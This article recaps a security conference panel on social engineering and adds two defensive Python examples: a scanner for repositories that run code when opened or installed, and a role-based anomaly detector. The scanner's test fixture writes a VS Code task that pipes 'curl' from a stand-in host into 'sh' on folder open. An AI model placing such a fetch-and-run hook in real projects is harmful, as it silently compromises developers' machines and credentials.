The Human Element: Decoding Social Engineering in Offensive Security
Technology advances at a breakneck pace, yet the most critical vulnerability in any enterprise remains the same: the human being. Often dubbed the "eighth layer" of the OSI model, human psychology is continually exploited by sophisticated adversaries. At the VULNCON 2025 CXO Panel, industry leaders Rex Pushparaj, Navdeep Aggarwal, and Anant Shrivastava, moderated by Divakar Prayaga, dissected the modern landscape of social engineering, revealing how attackers bypass technical controls by targeting the human element.
Divakar Prayaga (Moderator): Cyber Executive Leader, Startup Mentor & Advisor, T-Hub & NASSCOM
Anant Shrivastava: Founder & Chief Researcher, Cyfinoid Research
Rex Pushparaj: Founder & CEO, Rex Cyber Solutions
Navdeep Aggarwal: Product Security Leader, GE Healthcare
Here is a deep dive into the evolving challenges and the strategic mitigations enterprises must adopt to secure their organisations.
The Evolving Threat Landscape
Social engineering is a decades-old practice, but its tactics have evolved dramatically to bypass modern defences. Attackers no longer rely solely on poorly worded phishing emails. Today, they leverage AI to craft impeccable, customised messages and exploit region-specific features, such as spoofing alphanumeric SMS sender IDs to seamlessly mimic legitimate organisations, like banks.
Furthermore, modern social engineering often converges with physical and infrastructure vulnerabilities. For instance, in a recent sophisticated attack in Singapore, adversaries sat outside a corporate compound, compromised the external Wi-Fi and CCTV cameras, and used the camera feeds to watch employees' keystrokes and the OTPs displayed in plain sight, resulting in a $1 million loss. In another instance involving the supply chain, adversaries successfully rerouted a package of sensitive materials to the US instead of South Africa by compromising inactive Active Directory accounts and enabling them only at the moment an approval was required, so the accounts never appeared active long enough to draw attention.
Cultural Vulnerabilities and High-Risk Sectors
Cultural tendencies significantly affect an organisation's susceptibility to social engineering. A deep-seated culture of trust makes individuals more willing to share personal information, often prioritising trust over privacy and failing to verify the requester's intent.
- The Healthcare Sector
In healthcare, the intense focus on patient survival creates an ecosystem of extreme vulnerability. Patients and families willingly hand over sensitive Personally Identifiable Information (PII), such as Aadhaar numbers and OTPs, without questioning why a diagnostic lab or hospital receptionist needs them. Attackers exploit this by sending fake diagnostic reports via WhatsApp, immediately compromising the devices of anxious patients who click the malicious links.
- Human Resources (HR) & Sales
HR and sales are frequently targeted as "low-hanging fruit". Unlike developers, HR professionals are mandated by their roles to engage with external communications, open external attachments such as resumes, and uphold a prominent public profile on platforms like LinkedIn. Despite holding the "crown jewels" of the organisation - including both PII and Protected Health Information (PHI) for all current and past employees - HR departments rarely receive the same level of security investment as product development teams.
Advanced Pretexting and Baiting Techniques
Attackers are highly skilled at pretexting—fabricating scenarios that make logical, everyday sense to the target. For example, adversaries target new hires by posing as IT support, exploiting the fact that default corporate credentials (like variations of "welcome@123") are often still in widespread use.
- Exploiting Greed: Baiting techniques have matured significantly. Attackers target developers by posing as job seekers and sharing malicious GitHub repositories; the promise of a lucrative employee referral bonus entices the target to clone the repository or open it as a Visual Studio Code project. Because an editor such as VS Code can run workspace-defined tasks and honour workspace settings as soon as a folder is opened, merely opening the project can hand the attacker the developer's AWS credentials and the contents of their home directory. Workspace Trust (opening unfamiliar folders in restricted mode) exists for exactly this reason, and "trust this folder" should never be the reflex answer for code received from a stranger.
- Exploiting Ego: Attackers also provoke emotional responses by criticising an employee's work. By attacking a developer's code or an HR manager's hiring practices, attackers trigger the target's ego to elicit a rapid, unguarded response.
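For the malicious-repository bait described under "Exploiting Greed", the practical counter-measure is to inspect a received repository for anything that executes on open or on install before trusting it in an editor. The following is an added example written for this article, not tooling from the panel or any vendor: it walks a cloned repository and reports VS Code tasks configured to run on folder open, VS Code workspace settings that redirect the editor or a common extension to an executable (the flagged keys are an illustrative, assumed list, not an exhaustive one), and npm lifecycle scripts that run automatically during `npm install`. The booby-trapped sample repository it builds in a temporary directory is constructed for the demonstration.

```python
"""Pre-open hygiene check for a repository received from an untrusted source.

Added example for this article (not tooling from the panel or any vendor): it
walks a cloned repo and reports files that execute code merely by being opened
in VS Code or installed with npm. The flagged settings keys and the sample repo
it builds are assumptions chosen for illustration.
"""
import json
import os
import re
import tempfile

# VS Code workspace settings that point the editor or a common extension at an
# executable; illustrative, not exhaustive.
EXEC_SETTING_KEYS = ("git.path", "python.defaultInterpreterPath")
EXEC_SETTING_PREFIXES = (
    "terminal.integrated.profiles.",
    "terminal.integrated.automationProfile.",
)
# npm lifecycle scripts that run automatically during `npm install`.
NPM_AUTO_SCRIPTS = ("preinstall", "install", "postinstall", "prepare")


def load_jsonc(path):
    """Parse JSON that may carry // line comments and trailing commas (VS Code JSONC)."""
    with open(path, encoding="utf-8") as fh:
        text = fh.read()
    try:
        return json.loads(text)
    except json.JSONDecodeError:
        text = re.sub(r"^\s*//.*$", "", text, flags=re.MULTILINE)  # drop comment lines
        text = re.sub(r",(\s*[}\]])", r"\1", text)                   # drop trailing commas
        return json.loads(text)


def walk_keys(obj, prefix=""):
    """Yield (dotted key, value) for every leaf of a nested JSON object."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield from walk_keys(value, prefix + key + ".")
    else:
        yield prefix.rstrip("."), obj


def scan_repo(repo):
    """Return human-readable findings for auto-executing configuration in `repo`."""
    findings = []
    tasks_file = os.path.join(repo, ".vscode", "tasks.json")
    if os.path.exists(tasks_file):
        for task in load_jsonc(tasks_file).get("tasks", []):
            if task.get("runOptions", {}).get("runOn") == "folderOpen":
                findings.append(
                    f"tasks.json: task {task.get('label', '?')!r} runs on folder open: "
                    f"{task.get('command')}"
                )
    settings_file = os.path.join(repo, ".vscode", "settings.json")
    if os.path.exists(settings_file):
        for key, value in walk_keys(load_jsonc(settings_file)):
            if key in EXEC_SETTING_KEYS or key.startswith(EXEC_SETTING_PREFIXES):
                findings.append(f"settings.json: {key} overridden to {value!r}")
    package_file = os.path.join(repo, "package.json")
    if os.path.exists(package_file):
        scripts = load_jsonc(package_file).get("scripts", {})
        for name in NPM_AUTO_SCRIPTS:
            if name in scripts:
                findings.append(f"package.json: {name!r} runs during npm install: {scripts[name]}")
    return findings


def build_sample_repo(root):
    """Write a constructed 'take-home assignment' repo carrying all three traps."""
    os.makedirs(os.path.join(root, ".vscode"), exist_ok=True)
    with open(os.path.join(root, ".vscode", "tasks.json"), "w", encoding="utf-8") as fh:
        fh.write(
            '{\n'
            '  // looks like ordinary dev tooling\n'
            '  "version": "2.0.0",\n'
            '  "tasks": [{\n'
            '    "label": "setup", "type": "shell",\n'
            '    "command": "curl -s https://example.invalid/s | sh",\n'
            '    "runOptions": {"runOn": "folderOpen"},\n'
            '  }],\n'
            '}\n'
        )
    with open(os.path.join(root, ".vscode", "settings.json"), "w", encoding="utf-8") as fh:
        json.dump({"git.path": "./tools/git",
                   "python.defaultInterpreterPath": "./.venv/bin/python"}, fh)
    with open(os.path.join(root, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "assignment",
                   "scripts": {"postinstall": "node scripts/telemetry.js"}}, fh)


def demo():
    """Build the sample repo in a temp dir and scan it; returns the findings."""
    root = tempfile.mkdtemp(prefix="suspect-repo-")
    build_sample_repo(root)
    return scan_repo(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run it against a freshly cloned directory before opening the folder in an editor; a single finding is reason enough to read the repository in a plain viewer or a disposable VM instead. The settings check deliberately errs on the side of noise: a `python.defaultInterpreterPath` inside the workspace is common in honest projects, so the point is that a human looks at the value, not that the key alone is proof of malice.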
Strategic Defences for the Enterprise
Technology alone cannot solve the social engineering problem, as no technical control can prevent an employee from willingly authorising a fraudulent transfer if they believe the request is legitimate. Securing the enterprise requires a holistic, process-driven approach:
- Behavioural Anomaly Detection: Organisations must profile normal user behaviour to detect deviations. For instance, if an HR employee—who typically uses Word and Excel—suddenly executes a PowerShell script, the system should automatically lock the account pending investigation.
- Outbound Traffic Visibility: While most organisations monitor incoming connections, monitoring and prompting users about anomalous outgoing connections can provide a critical friction point. Forcing a user to explicitly approve an outbound connection to an unknown domain can disrupt the attack chain.
- Role-Based Awareness Training: Generic compliance training is ineffective and leaves organisations exposed. Awareness programs must be highly customised based on the specific operational threats faced by different roles, such as the distinct threat models for HR teams versus developers.
- Gamification and Positive Reinforcement: Instead of only punishing users who fail phishing simulations, organisations should reward those who successfully identify threats. A well-tuned reward system incentivises proactive threat hunting among employees, turning them into active defenders.
- Robust Process Controls: Implementing strict Maker-Checker processes, segregation of duties, and rigorous role-based access control (RBAC) ensures that no single compromised human can authorise critical transactions, approve shipments, or merge sensitive code without secondary validation.
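The Behavioural Anomaly Detection and Outbound Traffic Visibility points above are instances of one detection pattern: learn what is normal for a role, then act on the first value that falls outside it. The following is an added example written for this article, not a product or rule set the panel described; it generalises the HR-runs-PowerShell case to any event kind. It builds a per-role baseline from a constructed learning window of process-start and outbound-connection log lines (the log format, the user-to-role directory and all event data are constructed for the demonstration), then replays a constructed live window and emits the response the text proposes for each kind: lock the account for an unexpected process, prompt the user for an unexpected destination. A user absent from the directory has no baseline and therefore alerts on everything, which is the safe default.

```python
"""First-seen baseline detection over process and egress events.

Added example for this article, not tooling the panel described or any vendor
product. The log format, the user-to-role directory and the event data below are
constructed for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass
import os


@dataclass(frozen=True)
class Event:
    ts: str
    user: str
    kind: str    # "process" (a process was started) or "egress" (outbound connection)
    value: str   # image path for process events, destination host for egress events


# Constructed directory lookup: who holds which role.
ROLES = {"alice": "hr", "carol": "hr", "bob": "dev"}

# Response per event kind, following the two controls in the text.
ACTIONS = {"process": "lock_account", "egress": "prompt_user"}

# Constructed learning window: ordinary activity for each role.
TRAINING_LOG = """\
2025-06-02T09:01:10 alice process C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE
2025-06-02T09:05:44 alice process C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE
2025-06-02T09:06:01 alice egress sharepoint.corp.example
2025-06-02T09:06:30 alice egress mail.corp.example
2025-06-02T09:10:00 bob process C:\\Users\\bob\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe
2025-06-02T09:11:12 bob process C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
2025-06-02T09:12:05 bob egress github.com
"""

# Constructed live window containing the HR-runs-PowerShell case from the text.
LIVE_LOG = """\
2025-06-03T14:02:17 alice process C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
2025-06-03T14:02:19 alice egress files.example.net
2025-06-03T14:05:00 bob process C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
2025-06-03T14:05:30 bob egress github.com
2025-06-03T14:07:41 carol process C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE
2025-06-03T14:09:00 dave process C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE
"""


def parse(log):
    """Parse 'timestamp user kind value' lines; the value may contain spaces."""
    events = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, user, kind, value = line.split(maxsplit=3)
        events.append(Event(ts, user, kind, value))
    return events


def normalise(kind, value):
    """Reduce a raw value to the form compared against the baseline."""
    if kind == "process":
        # Compare image names only, so a relocated copy of the same binary still matches.
        return os.path.basename(value.replace("\\", "/")).lower()
    return value.lower().rstrip(".")


def role_of(user):
    return ROLES.get(user, "unknown")


def build_baseline(events):
    """Per (role, kind): the set of values seen during the learning window."""
    baseline = defaultdict(set)
    for e in events:
        baseline[(role_of(e.user), e.kind)].add(normalise(e.kind, e.value))
    return baseline


def detect(events, baseline):
    """Alert on every value not in the actor's role baseline, with the kind's response."""
    alerts = []
    for e in events:
        key = (role_of(e.user), e.kind)
        value = normalise(e.kind, e.value)
        if value not in baseline.get(key, set()):
            alerts.append({"ts": e.ts, "user": e.user, "role": key[0], "kind": e.kind,
                           "value": value, "action": ACTIONS[e.kind]})
    return alerts


def run_demo():
    """Learn from TRAINING_LOG, then evaluate LIVE_LOG; returns the alerts."""
    return detect(parse(LIVE_LOG), build_baseline(parse(TRAINING_LOG)))


if __name__ == "__main__":
    for a in run_demo():
        print(f"{a['ts']} {a['user']} ({a['role']}) {a['kind']}={a['value']} -> {a['action']}")
```

Keying the baseline on role rather than on the individual is what lets carol, who never appears in the learning window, open Excel without an alert while alice starting PowerShell is locked out. The obvious caveat is that the learning window must itself be clean: a baseline learned while an intruder is already active will treat their tooling as normal, so seed it from a reviewed period and re-review any value an analyst later adds.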